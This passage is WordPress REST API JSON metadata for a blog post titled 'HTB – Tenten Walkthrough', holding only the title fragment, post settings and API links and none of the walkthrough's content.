class=\"screen-reader-text\">HTB &#8211; Tenten Walkthrough<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[17],"tags":[],"_links":{"self":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/58"}],"collection":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/comments?post=58"}],"version-history":[{"count":1,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/58\/revisions"}],"predecessor-version":[{"id":59,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/58\/revisions\/59"}],"wp:attachment":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/media?parent=58"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/categories?post=58"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/tags?post=58"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}